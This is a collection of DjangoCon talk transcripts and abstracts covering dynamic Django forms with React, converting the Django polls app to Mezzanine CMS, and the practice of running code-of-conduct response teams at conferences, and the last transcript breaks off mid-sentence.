Redux just stays updated with the state, and then when you save — when you post back to the server via Ajax — it's the same state, and whatever the user updated gets sent back. Thanks. So I really love the idea of sending the form structure to React as JSON, and having React components that mirror the Django form structure. My question is just: are your React components for forms open source, or do you know of any available projects that have fields that mirror the Django form structure? That is a good question, because we really should, and I think an ultimate goal of ours is to open source a solution once it becomes detangled from all the weird special-case stuff that we have written into it. So that's probably something that's going to happen in the future, because I can see it being useful to a lot of people who want to integrate Django and React. If you want to go that route, we already have a solution built, and I want to be able to say that it's going to be open source at some point in the near future; I just can't tell you exactly when that would be. I don't know if there are other projects that have that sort of thing. I know we can't be the only people integrating Django and React, and I think there's another talk even happening about that integration, so I'd be curious to see what other libraries are out there. I don't really know. Great. Thanks so much. Hey, you mentioned that you sometimes have third-party services where you do validation on certain user inputs, and that you don't want to do the actual appending of the errors in the form's clean method. So where do you actually do that, or what's your approach there? So I meant doing the service call in the actual form clean. What I would do is move that out into a method, so you don't have this huge clean — because you're going to have a whole bunch of stuff in your clean if you have any sort of complex requirements as far as the data that can be entered. So, in terms of where you would add the third-party errors, I would just do it in another method on your form that gets called in clean, but make sure that your clean doesn't become some unmanageable thing. That's what I was getting at with that. Hello. Thank you for your report. I have a question. So, with your approach, the front end controls the structure of the form, right? So are there some security issues like cross-site scripting — like, from JavaScript, can I post some unwanted fields that shouldn't be there? So, I guess the front end does not actually control the structure of the form, right? The data — I guess you're talking more about the user-driven fields thing? And even for that, there always has to be a superset of what is allowable, because you can't let the user define custom fields. Or if you do, you have to hack around it and do something where the custom field the user is defining is actually some concrete field on the back end. You can never let the user modify your actual form structure. So what we have is a superset of all the possible things the user could do. We don't let them add their own dynamic things that aren't part of our superset, because, you're right, that would have security issues. I mean, even so, there is, for example, a field like credit card number.
And you expect it only in some circumstances, like, user should fill in his first and last name or some checkbox. But I can construct, um, JSON that contains credit card without those fields. And I can send it. So do you have some additional server-side validation for such cases? Yeah, so the field structure, the form that renders, um, it has to match, or rather the form that the user enters data into has to match the back end. They're not two separate structures. So if I send you, if I render a field structure, but then the user enters an additional, I guess in that case, um, that doesn't really hit the server-side. If I understand what you're suggesting, is that, like, somebody scripts an additional field that isn't really on the form? Uh, it is on the form, but it appears only in some case. Right, and, right, in that case, your field structure on the back end would know that that's not there. And so that data, the data would, you would get some sort of validation error on the back end when you try and post a field that isn't there. That would cause a problem. Okay, thanks. Have you tried to allow a user to get halfway through a, um, kind of long form, um, and save their state and then come back to it and pick up where they left off, maybe in the middle of one particular form? Yeah, so we've gone back and forth about that, it seems like. Like, um, but yeah, do you have some others, like, specific questions about, like, doing that? Just, just, like, yeah, have you had challenges since you have tried it? Have you had challenges integrating that kind of work, doing that with this workflow? Yeah, um, the problems with that, we have had a lot of challenges with that. The problems with that tend to be, like, validation. Like, um, we have all these problems about, like, what kind of validation, some validations are not important all the time. Uh, for instance, like in that case, if you want the user to be able to save partial data and come back later, uh, you don't want, you don't want to always run your required validation. But your required validation is important, so, uh, we've gone, we've gone back and forth about, like, what you actually do in those circumstances. But I think it's definitely, with this structure, it's not a super difficult problem to solve. I think you can go back and forth pretty easily on what you actually want the end user behavior to be. Alright, so, uh, I think that's it then. APPLAUSE
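Picking up the earlier Q&A answer about sending form errors back to React as JSON, a rough sketch of such an endpoint might look like this (PollForm, the field, and the URL wiring are hypothetical stand-ins, not the speaker's actual code):

from django import forms
from django.http import JsonResponse
from django.views.decorators.http import require_POST

class PollForm(forms.Form):  # hypothetical stand-in for the real form
    question = forms.CharField(max_length=200)

@require_POST
def save_poll(request):
    # Validate the Ajax-posted data with a normal Django form and hand
    # any errors back to the frontend as JSON for React to render.
    form = PollForm(request.POST)
    if form.is_valid():
        # ... persist the data here ...
        return JsonResponse({"ok": True})
    errors = {name: [str(msg) for msg in msgs] for name, msgs in form.errors.items()}
    return JsonResponse({"ok": False, "errors": errors}, status=400)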
|
We'll look at a few core problems that we were able to solve with Django forms. Dynamic Field Creation: What if you don't know what fields should be present on a Django form until runtime? Solutions: Viewing a form's fields as a data structure (convert a field definition to a dictionary); manipulate self.fields on a form to dynamically add / remove fields from a form. Pitfalls: A field's validation attributes can't be manipulated dynamically because of Validators within the forms API. Dynamic form layouts become difficult to manage; crispy-forms does not scale as a solution! Validate a form via an API: How can external validations behave the same as internal errors? Solutions: form.clean() can be used for form-wide errors, and form.add_error can be used to integrate those external validation errors into your existing form so that calls like is_valid() still work as expected with your external validations. Adding fields at runtime: How can the user add fields to a form after it has been rendered? Solutions: Javascript can be used for the UI, and if the fields are properly named, the same validations will work as long as the fields are part of the form. Pitfalls: Creating a solution that creates a dynamic field that is validated, but doesn't render, can cause issues with your layout solution (crispy-forms fails again here).
|
10.5446/32717 (DOI)
|
Come on, Noah! MUSIC Okay, yeah, I'm Ed. I'm a contributor to Mezzanine CMS. In this talk, I want to take us on a journey to explore the features that Mezzanine provides by default and how they, combined with your Django knowledge, can help you really make the most out of it and create great content-oriented sites. We're also going to explore taking an existing Django app and converting it to a fully integrated Mezzanine app. Right, so I want to start by talking a little bit about Mezzanine CMS. Who here knows anything about Mezzanine? Alright, so this introduction is going to be needed. Well, here's a little bit of trivia for you. It was created by Stephen McDonald, a guy from Australia. It's been under development for seven years now, with commit activity every week. It has more than 275 contributors. You can also find a very helpful community: we have a very active mailing list where you can get development help and support in general. It's well documented, I believe, and you also have a variety of third-party packages, many of them available through pip too. So now, a little bit more about the architectural, philosophical side of Mezzanine. Mezzanine is a very powerful, consistent, and flexible content management platform. It provides a very simple yet highly extensible architecture that encourages diving in and hacking on the code. You get the same batteries-included approach as Django, but applied to content management. You get a blog for free, hierarchical page navigation, scheduled publishing of your pages, multi-tenancy support for multiple sites, and there's a huge list of other features that are there for you. Mezzanine also inherits a bunch of Django's fine-grained permission controls and security best practices, of course, and you'll be able to leverage much of the goodies and things that you already know about Django in your Mezzanine application. But maybe the most important thing about Mezzanine is: it's just Django. It's right there in the docs if you go check them. There's a quote that says, Mezzanine is just Django, so everything you know about writing models, writing views, writing templates will serve you well, and you'll be able to hit the ground running if you know at least a little bit of Django already. All right, so let's get started now and convert a small application. Well, let's start with installing Mezzanine and then convert an application to work with it. So as you can see, as with any other Python package, you can install it via pip. It will download all the dependencies, including Django. Then you can run the mezzanine-project command, which — don't get scared — is just a wrapper around Django's startproject command, and it will give you the starter layout or project template with some of the settings and URL configuration already filled in for you. But other than that, it's just a regular Django project. Then after that, you run createdb, which is just a wrapper around migrate from Django. You only need it to create a default superuser, and if you want, you can also install some demo content to get started quickly. And after that, run runserver, which is just a standard Django command. So now you open your browser at localhost, and this is what you get out of the box. You have a complete nested page tree, you've got site search, you've got a basic Bootstrap template, you've got a blog, and many, many other things just for free, just from installing Mezzanine via pip.
So let's write our own application — or convert one, a standard Django application — to better integrate it with Mezzanine. I'm going to use the polls application, because I think it's well known if you have ever completed the Django tutorial. It's just a very simple application. I like it because it will let us play with two models: the Poll model, which, if you remember, just has a question prompt, and then the choices, which are an inline model that lets you give options for answering the question you're polling about. These are edited in the admin; you just register the admin class. It has a list and a detail view, and it will handle form input like voting. This is what the polls application does by default when you complete the tutorial. So how do you install an application in Mezzanine? Well, it's just like any Django project. You add your app to INSTALLED_APPS in settings, you wire up your URL configuration, and finally you run migrations, if any, and you're up and running. Of course, if your app is more complex and you need to define custom middleware, context processors, or anything like that, you can do it. It's just like installing anything in Django. So right after doing that and adding the polls application, as it came from the tutorial, directly into the Mezzanine project, this is what you get. Mezzanine uses a Grappelli-based admin interface, but other than that, you don't need any changes in your admin class or your model definition or anything to get this working. You get the regular model admin and also the inlines, just as you defined them in the regular application. And the public-facing views also work as you would expect. This is the view that comes with the polls app. Again, you just wire the URL configuration and you'll get this working out of the box without any changes. So let's spice it up a little bit. Let's say that some new requirements come in and you want to change the behavior of the application. We can do that, but let's define those requirements. Let's say you want a publishing workflow. And what do I mean by a publishing workflow? We want some polls to be able to be set as draft. For example, if our admin users are creating a new poll but they don't want to publish it right away, they can save it in the admin, save it as draft, and it will not be available on the public site. So they can come back and work on it later. We also want them to be able to schedule publishing. We want them to be able to say, okay, this poll is going to go live next week, Monday, midnight. And we also want to set expiration dates; we want to say, okay, this poll is going to expire next Friday at the end of the day. We also want the most recent polls to appear first, so we want some way to track which poll was published recently, which is a common requirement. We also want to use slugs instead of primary keys in the URLs. For SEO and readability purposes, maybe we don't want to have mysite.com/poll/43 when we can have poll/my-awesome-poll — more shareable, more readable. And we also want the choices to be sortable. Our admin users, let's say, don't want the choices sorted just in the order they added them; maybe they want to change the sorting after that. So how are we going to do that with Mezzanine? Well, this is the original model, the original polls model.
As you can see, it's very easy — just a single field, the question, which is just a text field for users to enter the question. Now, the Displayable model. This is one of the base models that ships with Mezzanine, and this is the one that you're going to be inheriting from a lot. It's a base for all public-facing content pieces in Mezzanine. This is what's going to add the draft/published status to our model instances. This is also what's going to allow you to do scheduled publishing. It can auto-generate slugs from your title and just create them automatically, though you can override these slugs if you want to craft them yourself. And it comes with some helper admin classes and a manager for that. You're going to get some fields by default. You're going to get a title field. You're going to get a meta title field if you want to change how the piece of content appears in the browser title bar. You're going to get the slug field, which can be auto-generated or customized. You'll also get a description, in case you want to automatically populate the browser meta description with the description of your content or the content from your page. You also get a publish date, which is a standard Django datetime that you can manipulate later. You also get the status, where you're going to be able to check whether a piece of content is published or set as draft, and a bunch more, which are not important right now. So we're going to inherit from this model. We just import it from Mezzanine and subclass it, and that's it. We actually can get rid of the question field, because the model is going to define its own title field, and that's what we're going to use for the question. And, yeah, just inherit from it. Of course, in case you need to add more fields, you can do it normally: create your own Django fields and customize. If we want to say, oh, it's going to have a picture, for example — okay, a file field right there. And this is the original admin. You can see we have to define our fields, we want to define the inlines to display the choices, we want to define what's going to be displayed in the list view, and we want to define what is going to be searchable from the admin. This is the original one that came from the polls application, and this is how it looked. And now we're going to use the DisplayableAdmin class. And it's the same: we're just going to inherit from Mezzanine's class. The only change we need to make is to tell it which inlines we want to use — the choices — and we just need to specify that, because we'll see how this changes the admin interface for us. So this is the new admin you get. You can see you get, well, the title — that's our old question field, we use that now, and the slug will be generated from it, and you can automatically use it in your views to retrieve the object. You also get the draft/published toggle for your users to pick whether they want the content to be draft or published. You can set the 'published from' and 'expires on' dates to define when something should be available on the public site. And in the metadata panel, which is a collapsible panel, you'll be able to tweak the generated slug, add meta keywords, add a description, and choose whether to include this page in your site's sitemap. And in the list view, we're going to get a full search on the title of the polls. We're going to get a date hierarchy on the publish date.
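A rough sketch of what the converted app might look like, pulling together the Displayable model and DisplayableAdmin described above with the Orderable choices and published() queryset that come up just below (an illustration based on the talk, not the exact slide code):

# models.py
from django.db import models
from mezzanine.core.models import Displayable, Orderable

class Poll(Displayable):
    # Displayable already provides title, slug, status, publish_date,
    # expiry_date, description and more, so the old question field goes away.
    pass

class Choice(Orderable):
    poll = models.ForeignKey(Poll, related_name="choices", on_delete=models.CASCADE)
    choice_text = models.CharField(max_length=200)
    votes = models.IntegerField(default=0)

# admin.py
from django.contrib import admin
from mezzanine.core.admin import DisplayableAdmin, TabularDynamicInlineAdmin

class ChoiceInline(TabularDynamicInlineAdmin):
    model = Choice

class PollAdmin(DisplayableAdmin):
    inlines = (ChoiceInline,)

admin.site.register(Poll, PollAdmin)

# views.py
from django.views.generic import ListView

class PollListView(ListView):
    def get_queryset(self):
        # Only published polls, most recently published first.
        return Poll.objects.published().order_by("-publish_date")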
We're going to be able to filter by status. You're going to be able to switch the published status of the polls right from the list view. So all of this we got just from inheriting from Mezzanine's models and Mezzanine's admin classes. So now, how about the view? If we know that some of our polls are going to be draft and some are going to be published, we of course only want users to see the published ones. We simply have to use the published manager. Basically what you have to do — and this is a very simple class-based view, the one that is shipped with the polls application — the only thing you want to do is, when you're getting your queryset, either in a class-based view or a function-based one, instead of doing objects.all, you do objects.published. And with that, with the manager that comes from Mezzanine, you're going to return only the published ones. So you don't have to worry that your public-site users are going to see content that wasn't meant for them. And after that, you can order by the publish date to get the most recent polls first. Yeah, so this is what the view ends up looking like. You get the polls, and you have them sorted by how recently they were published. The next thing is what we were talking about: being able to sort the little inlines, the choices. We don't want the choices to appear in the order they were added. Maybe the admin users want to say, I want this one on top, let's move this one to the bottom. So we're going to use the Orderable model, which also ships with Mezzanine. It's ideal for sortable inlines, and its inline admins come in both stacked and tabular varieties. You can drag-and-drop sort with it. And it also supports dynamic creation of more inline forms, so you don't have to define how many extra inlines you want to show to the user. They can just keep creating them and populating them. Of course, you can limit that with the standard Django admin classes. So it's the same here. We edit our Choice model, we inherit from Orderable, and we just set a foreign key to our old Poll model, set the choice text, and set the integer field to store how many votes each choice has got. And in the admin class, we only inherit from TabularDynamicInlineAdmin — there's also the stacked variety. And this is what you get. You get your choices, and you get those little handles, which you can sort. Admin users can use their mouse to sort them; they can use any arbitrary ordering they want. And they also get the little 'add another' button, which lets them create as many inlines as they want. They don't have to do three at a time or anything like that. And lastly, well, some templates. I'm just going to go quickly over this because we don't have much time. But this is the template that the polls application came with, right? Not very pretty. But, you know, you can write any CSS you want — it gives you all the flexibility. But if we go ahead and edit it to extend some of the basic templates that come with Mezzanine already — if you, for example, extend the base HTML template, use the title block, and put all your main content in the main block — this is what you get. You get it integrated into the Bootstrap theme. Now, here I know you might have different opinions on Bootstrap and everything. The point here is not to make you use Bootstrap. I don't want you to think that, oh, Mezzanine is Bootstrap, and then I cannot do anything else with it.
It's just there as a default to get you up and running quickly. You want to show a prototype quickly, you want to use a free Bootstrap theme — then this is for you. You only have to extend Mezzanine's templates and use the right blocks, and you can get something like this very quickly. So let's review what we did — the steps that we followed to convert a regular Django application into a fully integrated Mezzanine app. For your main models, you're going to want to evaluate whether to inherit from Displayable to get all the public-facing goodies that we reviewed before: the auto-generated slug, the published status, the scheduled publishing. For inlines, you're probably going to want to inherit from Orderable to get that drag-and-drop ordering on your models. When you're making queries in your database, in your views or wherever, you want to use objects.published instead of objects.all to make sure that scheduled publishing works as expected. And then for templates, you want to extend Mezzanine's blocks, and you want to use the Mezzanine-included templates if you want to use Bootstrap on your site and just get that site up and running quickly. Now, there's a whole bunch of things that I haven't even talked about here. Mezzanine supports custom page types, so you can create custom pages that your users can use when building the page tree in Mezzanine. You also have a complete file manager on your server, which means users can upload and manage their files. Instead of just having that little file input in your forms in the admin, you can have one that lets them browse the media that already exists on the site, and it's much easier to work like that. Mezzanine also ships with a series of Fabric scripts that you can use to automate deployments. So if you get a $5 VPS from any web hosting provider online, you can get up and running very easily, even if you haven't done any Django deployments before. It also has page processors, which are like writing views, but for your custom pages, and they let you inject context into the template, whatever you need. It also has an e-commerce module, where you're going to be able to integrate a shopping cart, shop categories, prices, and variations. It also has a WYSIWYG editor, which is swappable, in case you don't like the default — you can very easily define your own custom class and include your media to be used instead of the default. It also has user-editable settings, which allow your users to edit very simple stuff like, I don't know, your site's Facebook or Twitter URL. You just want to type that in; you don't want that in version control. You want them to edit it in the admin — it's easier — and you can use it wherever you want in the back end or in your templates. So there's a little bit more you can read — I mean, what can you do after this talk? Mezzanine has a page in its documentation called the content architecture, and I think it's one of the most important pages. It goes into detail on what I've explained here: what the Displayable model is and what you're supposed to do with it. It also covers another strategy for creating custom page types, which is out of the scope of this talk, but you should read that. There are a couple of community blogs that you're going to be able to read that are very good on some specific, battle-tested parts of developing Mezzanine applications, and there's also the Mezzanine blog application.
As I told you, out of the box you're going to get a blog for your site. This blog application is, I think, a great case study of a non-trivial app developed for Mezzanine, because it has a good deal of views, it has much more complex models, it has its own template tags, so it's a good way to see how you would create a more robust, complex application that is integrated with Mezzanine. There are no links there, but I'm going to share the slides later and they will have links. Thank you. I've left some of the slide URLs there, and there's a repo for this — all of the things that we went through here — which you can use to better understand how to convert your Django app to a Mezzanine app. Thank you. Hey, it's nice to understand how Mezzanine works. I just have a curious question: since Mezzanine is more about content, what level of support can it provide for NoSQL-type data flowing from Django into it? There was a branch of Django that started developing NoSQL support, so how does this framework adapt to that? On that level, I'd say it's the same as Django. I mean, if you can get a non-relational database working with Django, with the ORM — that's what Mezzanine uses, the ORM — and if you can fake that, so to speak, it should work. I haven't really done it, and Mezzanine doesn't provide anything specific for it, but whatever works with Django will work with Mezzanine in that respect. Thank you. Does anyone else have a question? Alright, thank you for your time.
|
Mezzanine CMS is a popular content-management solution for Django. With a rich set of built-in features and following Django’s batteries-included approach, it can supercharge your new or existing apps for content-oriented sites. In this talk we will explore the features that Mezzanine provides by default, and how they take care of many common content-management tasks (page creation and editing, maintaining a blog, WYSIWYG editors, SEO, and more). We will also take an existing Django app and convert it into a fully integrated Mezzanine application. You’ll be surprised at how much of the work has been done for you, and how your existing Django skills will let you hit the ground running when working with Mezzanine. Outline: Mezzanine tour Basic integration of custom models Advanced integration of custom models Working with templates Review Questions (if time permits)
|
10.5446/32719 (DOI)
|
Come on, yo! Hello everyone, it's a really, really great pleasure and an immense honor to be standing here today. We both know it's been a very, very long day. It's very hot outside, it's very cold inside. There have been lots of amazing talks today, a lot to take in, so we're really, really glad that you decided to come to ours. So today, we're going to be talking about code. About code of conduct. So the code of conduct — or, as we're probably going to refer to it from now on, CoC — can be quite a sensitive topic. And personally, I didn't feel like I could present this just on my own. But luckily today, I'm not alone on stage. I'm accompanied here by my good friend, Ola. So Ola, she's a long, long time member of the Django community. As was said before, she lives in London, where she works for a company called Potato. But she's originally from Poland. You probably know her the most for co-founding the Django Girls initiative, but she has many, many other talents. She's organized several DjangoCons, including one that was held in a circus tent in Poland. And she also has her own YouTube channel, where she teaches programming to women. And I couldn't be more grateful to have Baptiste as my co-presenter. He lives in Hungary, but he's originally from France. And while working with him on various community programs, I discovered that he has this gift of always putting other people before himself. And it is visible in everything he does: in his contribution as a Django core developer, in his skills and what he does as a conference organizer, and also in his work with Django Girls. And Baptiste is also the person you want to find if you want to translate something from English to emoji. And together we've been working as CoC points of contact at five major Python and Django conferences over the last three years. And even though we don't consider ourselves experts, we hope that in our talk we'll answer at least some of the questions you might have regarding codes of conduct. And at this point I want to stress that even though the things we will talk about in this talk are based on our conference and events experience, you can take the lessons we learned and apply them to your workplace or open source project or literally any place where people meet and interact. And this is because code of conduct and culture go together side by side, and one is reflected in the other. So I want to start by explaining what we won't be talking about. We're not here to discuss whether your community, company, or project requires a code of conduct or not. There are many resources online; we don't really have the time for it. I think it's best summed up by this tweet from Lena Reinhardt. Let's let you read it for a while. Basically, to sum it up, the moment you have humans interacting, you want to have a code of conduct. There's just no way around it. Also, we believe that the Django community as a whole has kind of moved past the point where we're just arguing about whether we need one, and we just accept as a fact that our community actually needs one. So instead today, we'd rather focus on how you actually implement a good code of conduct in production, so to speak. We'd like to explain what it means in practice to have a code of conduct, with some concrete examples that we've had over the years and some tips that we've learned along the way.
But before we do that, we want to start with a bit of history of codes of conduct inside our communities. It's very hard to determine when the first movements to implement codes of conduct in the tech industry started. And there are a lot of people who worked really hard to make codes of conduct a standard, and we are incredibly grateful for their work. There are too many people to name here, so we just want to say a big thank you to all the amazing people who dedicated their time and effort to make codes of conduct a thing. Our community really stands on the shoulders of giants. But going back to the Django and Python communities, we did some research and established that 2012 was the year when the code of conduct started to be an important topic. PyCon US implemented one in March 2012, followed by DjangoCon Europe in Zurich in May. And at the end of the year, on the 21st of November, the Python Software Foundation required conference organizers to have a code of conduct at any event it wanted to sponsor. And similarly, on January 9th of the following year, the Django Software Foundation did exactly the same, and the board voted that they would only fund events that had a code of conduct. And later on, a few months later in April, the Python community adopted a code of conduct as a whole, for all its online spaces, and they were followed very soon after, in July, by the Django community, who did exactly the same. And the important thing here is to realize that the Django community started the discussion about the code of conduct quite early — at least this is what I feel. And we improved immensely, and the code of conduct is present and visible not only at Django and Python conferences, but also in the online spaces where our community interacts. And we don't discuss if and why we need it; we discuss how to improve it. And the Django code of conduct was even showcased as a good example of a community code of conduct by other initiatives. And I think we should be really proud of the Django community for being really forward-thinking and striving to be a nice and welcoming place for everyone. But even though we find that CoCs are kind of standard in our communities, in practice it's not always so easy. You can't just put a piece of text on the website for your conference or your community and be done with it. It's only when you deploy to production, when you start to interact with real users, that you actually start to see edge cases and things that you hadn't thought about. And during the last years, when we served as members of various code of conduct response teams, we learned our share. The response team is responsible for enforcing the code of conduct: they receive the reports and are in charge of handling them. And believe me, we were far from being perfect. We have a whole list of things that we wish we had done better. And because we think that you can learn from our mistakes, we're going to give you a few examples of the things that we wish we had known in advance. So for example, there was a conference where we had a Slack channel similar to what we have this year. Attendees could talk with each other and arrange dinners and stuff like that. And for us it was a big experiment. We didn't really think about it too much, didn't think about the consequences. And with hindsight, I think even though it worked really, really well, we made a few mistakes.
Like for example one of them is that we never clarified from the start whether this was going to be like a one-time thing just for the duration of the conference or whether it was going to live forever after and if it was going to be moderated forever. We just created it and then we kind of let it on its own after the conference was over. And another problem we made was that we never set up explicit rules from the start. We just assumed people would behave and it would be fine. So we didn't say whether you could send private messages to people without being prompted. Whether you could advertise, send job postings, none of these things. And actually this ended up creating problems because two of the members they understood these implicit rules differently as it always happens. And this was a problem. And here you see that when we create a space for people to interact whether it's a space in a physical world like here today or whether it's a space online where people go and talk to each other, you need always to set explicit rules and not rely on just an implicit understanding. And you also need to think clearly and in advance about the boundaries of the space you're creating. And in boundaries in terms of space like where does the conference end and when does it start but also in terms of time as in this online space is going to be available forever or just for a short time. At another event there was another example of something we haven't thought through well enough. We decided to make code of conduct very visible. We put a lot of effort to create welcoming and safe space. We had like dedicated phone numbers for code of conduct. We had posters reminding about code of conduct even like lifts or elevators. Whatever is the right word in the US, I don't know. We had posters reminding about code of conduct and yeah, we emailed in every email to attendees. We reminded about that. And even though we put so much effort, we forgot something super crucial. And the thing was that we had no dedicated code of conduct email. So whenever you want to use an email, you have to write to all organizers. So you either found one of our emergency numbers, which is not perfect if you are like me and you hate phoning strange people, especially in foreign language. Or you try to find some people from response team and the people were all over the place. Another mistake we made at the same conference had to do with social media. We were using Twitter and we had official conference hashtag, which again was great because people could just go to one place and see everything that was happening. But we went through monitoring it closely and we were also very quick to just re-broadcast, retweet and like things that we just saw without looking too much into them. And again, social media is yet another space that you're creating that you need to have explicit rules for, but also you want to be able to monitor it. Like you want to have someone who has the ability technically and time wise to monitor and react when things happen on social media space. At another conference, we totally underestimated how much effort it is to handle code of conduct issues. And we had a small team, just two of us, and we also had other responsibilities. And we ended up just like dropping whatever we were doing for the conference because we had to deal with code of conduct. And it is so much easier to have a bigger team and dedicated only to code of conduct. And also it makes sure that you will not burn out on the way. 
Another thing we did wrong was that we had a conference party — an after-hours event — and we never really clarified whether it was an official party, that is, whether the code of conduct applied to it. And this resulted in some people attending the party and, let's say, losing their sense of responsibility, because they didn't really think the code of conduct applied there. And you see this pattern yet again: you have this space, and it needs to have explicit rules, because you can't rely on implicit rules. And you need to know what is acceptable and what is not, what is the conference and what is not, and what the rules are for each space, because each space may have slightly different rules. At one of the conferences we also had an unwritten "questions only, no comments" policy, but we didn't communicate that clearly. And that created very awkward moments for speakers after some talks, because our MC interrupted some of the people making comments. And when we realized that, we made the policy more clear and announced it on stage, but we wish we had been clearer about it at the very beginning. And one last example of things that we wish we had done better: there was a conference where we didn't have a dedicated physical room to handle code of conduct issues. We had the organizers' room, which is great, but then organizers who were not on the response team just kept popping in and out and interrupting. And you don't want that — CoC issues can be tricky, can be sensitive. You don't want to handle them in a crowded hallway where people are passing by, but you also want to limit it to only the response team. So you want to make sure that you have a room somewhere — it doesn't have to be big — that can be closed and where you can handle code of conduct issues. As you can see, we are indeed far from being perfect, and all these things we just talked about happened even though we're super dedicated to getting it right and we put a lot of effort into creating a welcoming space. Dealing with code of conduct issues is hard, and you will never get it 100% right. It's a living, evolving process, and there will always be something unexpected that you are not prepared for. So one of the most critical things you can do is plan for failure, because you will probably mess up and bad things will happen. And some of them just won't really be a big deal, but some of them might be. So you need to know how to handle a failure like this. One of the things you need to do is make sure you have a way to receive feedback, to listen to it and act on it, and make sure you know how to simply apologize. You need to make sure you have a process for when you make a mistake. You want to document these organizer failures and analyze them later, so that you can understand what went wrong and then correct it, so that you can improve. And also you want to be very public about this, I think, because owning up to your mistakes in public — it can be, trust me, a very humbling experience. But it sends a really, really powerful and positive message throughout your community that you really do care and that these things do matter. And in a way, some code of conduct issues are not a big deal. If you made some joke that a non-native speaker couldn't understand and it made them feel awkward, for example — well, it's just a joke. It's not a big deal, right? You meant well, it was just a mistake. And in a way it's not a big deal from the offender's point of view.
And when someone reports you, except for some really serious offenses, the code of conduct is not aimed at making you feel unwelcome, and you don't need to quit and never speak to anyone in the community. You are still a valuable member of the community. But at the same time it is a big deal. Because the tiny little comment you just made might be the thousandth one the person just heard, and they might just quit after that. And there is a term for that: death by a thousand cuts. So what matters, from the code of conduct response team's point of view, is the objective outcome of your actions. If your action excludes someone from our community, we will act and give you the necessary feedback. So you will know better next time and you have a chance to improve. And we believe that by handling the small things very seriously, we hope to build trust. So more people will feel okay to share their concerns and speak up if they need to. But what happens when someone speaks up? Concretely, what happens when someone files a code of conduct report? I think it's one of the things that can often seem very mysterious. It's scary, sometimes it even feels taboo. And we wanted to kind of open this up and clarify what actually happens. And so we made up this completely random and simplified example to show you the process that we go through when we get a report. So say we are at a conference like this one and we get a report by email saying that here's a tweet: someone's making fun of our speaker who's on stage, and they're using the conference hashtag. So how do we respond? So the first thing to do is to let the reporter know that we received the report and we will take care of it. And this is important because it means that we take responsibility for the situation and we'll take care of handling it. And as an organizer you probably want to handle the issue yourself, because otherwise people might try to find justice on their own or do public shaming, and it might be very, very serious. And it is also crucial to let the reporter know that you are dealing with this, to have a paper trail of what happened. Next up we gather the response team so that we can talk about the incident. We can coordinate a response, assign tasks to everyone. And one of the benefits here of having a team is that for one it's much, much easier to make hard decisions as a group as opposed to as an individual, which you might have to do. And the practical consequence of having a team is that you need to have a communication channel with this team, and it needs to be private so that nobody else has access to it, and it needs to be real time so that you can act quickly. So for example we've used a private Slack channel many times and it just works very well for that. At this point we take screenshots and try to gather as much information about the incident as possible. So we quickly determine that the person making the tweet is in fact an attendee: they posted a photo of their badge earlier and we can cross-check it with the list of attendees. And gathering facts early means that you don't need to rely on your memory later and you can concentrate on other things. So we met with the response team and at the end of the meeting we all decided together about our next action. So in our case we'll be speaking with the person and asking them to delete the tweet. It's good to have an idea, before you go into the meeting with the person, of how you're going to resolve the situation, so that you can minimize the damage.
We find the offender during the next break and ask them discreetly to join two of us in a private room. We found that two is an ideal number. You need more than one person sitting in, but more than two is just too intimidating. So we're meeting with the person, and the first thing we do is explain to them that we had a report and what was reported. And then we ask them for their own point of view. It's very important to give both sides a chance to explain their point of view. You have to be neutral in the sense of letting everyone explain their point of view. It's also important to explain how and why what happened is a violation of the code of conduct. It's part of letting the person improve. So in our case we explain to them what happened, we inform them that it's a violation of the code of conduct, and we ask them to delete their tweet. We gather our team again to inform them of the outcome of the talk, and we check that the tweet was indeed deleted. And it's important to make the final decision as a team and keep everyone in the loop. So one person on the response team immediately starts writing an incident report. That's a document where they establish a timeline of what happened, as detailed as possible. It lists the facts, what we know exactly happened, and also the people involved in the story. Writing the report immediately here is really, really key, because as more time passes, you always think you will have time later, but you probably won't. And also you tend to forget things. Maybe you won't be able to take screenshots later on, so it's very key that you act on this immediately. Finally we send an email to the reporter explaining the actions we've taken and thanking them for reporting. Again this establishes the paper trail, lets the reporter know that we actually took action, and builds trust. We also send an email to the offender repeating the outcome of the talk and we let them know that the case is closed. So the case is closed from the offender's point of view, but for us as organizers, as the response team, there are still a couple of things we need to do. One of them is that we forward the incident report to the Django Code of Conduct Committee. And we also, later after the conference, publish a transparency report where we list all the events that happened during the conference and how we resolved them. But this list is completely anonymized. The first step, forwarding the incident report to the Django Code of Conduct Committee, is a way to have a kind of long-term memory of what happened. It helps track repeat offenses that may happen over several years, over several conferences. And the second step of having a transparency report is something that we do to demystify the Code of Conduct process, to show exactly what happens so that people know things actually happen, but also to show how we respond to them and see that sometimes it's probably not a big deal. And this really helps, again, build some trust with the community. At this point for us as well, we consider the case closed and we move on to the next event. And as you can see, it's like so many steps for a very small thing. And the thing is, in real life, things can be more complex than that. The example here was very straightforward. The offender's identity was known and the person was cooperative. The damage was minimized by deleting the tweet.
But things could get much more complicated very, very easily, and the response team needs to make a call on the spot and sometimes judge what the best actions to take are. And when dealing with Code of Conduct issues, you have to be prepared to improvise. But even when you improvise, there is one thing that always needs to be your top priority: your attendees' safety. You have to know things in advance, like maybe the emergency numbers for your local area, or make sure that there is security staff at your venue that can expel people if you need to. Most likely you won't need that, but being prepared in advance just makes it so that when something happens that you didn't plan for, which will happen, then it just really lowers the stress and lowers the amount of energy you need to spend to respond to it. So we've seen with this process how you can implement the Code of Conduct in practice. But I want to stress that it's important to keep in mind that the Code of Conduct is not there for its own sake. It's not a tool of punishment or of enforcing some vague values that we have. For us as organizers and as community members, the Code of Conduct is one more tool in a tool belt that lets us create more inclusive events and more welcoming events. But it's not the only tool. You have many tools, like making sure your venue is accessible, having free childcare for speakers and attendees, having gender-neutral restrooms or food that caters to everyone's diets. You have many, many other tools. So we've seen the Code of Conduct is now a standard thing in our community, and we've shown you through examples that it is hard to get it right. And we realized that the hardest and most stressful thing for us in the whole process is when we need to improvise and we don't know what the next step is. And this is why we started to document our process into a step-by-step manual that takes out a lot of the improvisation and guesswork. It also takes some of the emotional factor out of the equation. And we are proud to announce that we are releasing our notes and our process online so the whole Django community, and not only the Django community, can use and improve them. And it is joint work with Ola Szytalska who is sitting there, and you should go and follow her if you don't do that yet. So this handbook is a collection of practical steps that you can take to improve your Code of Conduct process. It shows a process a bit like we did before, but much, much more in depth. It talks about some of the dos and don'ts, and it also has some things like templates for emails and reports that you can just reuse and fill in as you need. The repository is very new. It's still quite a work in progress, but we think it's already good enough for public consumption. We're also really, really interested in getting feedback on it, hearing the ideas of the community, and taking requests from anyone who wants to improve it. And if you get a space, we'll also be there as well, and so if 